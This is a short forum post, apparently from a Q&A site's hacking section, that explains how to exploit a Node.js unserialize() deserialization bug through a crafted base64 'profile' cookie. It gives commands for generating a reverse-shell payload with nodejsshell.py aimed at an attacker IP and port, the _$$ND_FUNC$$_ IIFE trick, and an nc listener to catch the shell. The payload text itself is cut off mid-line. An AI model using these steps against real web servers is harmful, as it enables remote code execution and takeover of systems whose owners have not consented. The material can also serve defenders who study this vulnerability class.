0 votes
in Hacking by

How to exploit Node.js deserialization bug for Remote Code Execution

The web application is reads a cookie named profile from the HTTP request, perform base64 decode of the cookie value and pass it to unserialize()function. As cookie is an untrusted input, an attacker can craft malicious cookie value to exploit this vulnerability.

Generate reverse shell payload using nodejsshell.py:
python nodejsshell.py Attacker_IP Attacker_Port
[+] LHOST = Attacker_IP
[+] LPORT = Attacker_Port

Now generate the serialized payload and add IIFE brackets () after the function body.

{"rce":"_$$ND_FUNC$$_function (){

Now perform Base64 encoding of above final payload, and then make a request to the web server with encoded payload in the Cookie header.

Start listen for a reverse shell using:
nc -l Attacker_IP Attacker_Port

Please log in or register to answer this question.

Welcome to My QtoA, where you can ask questions and receive answers from other members of the community.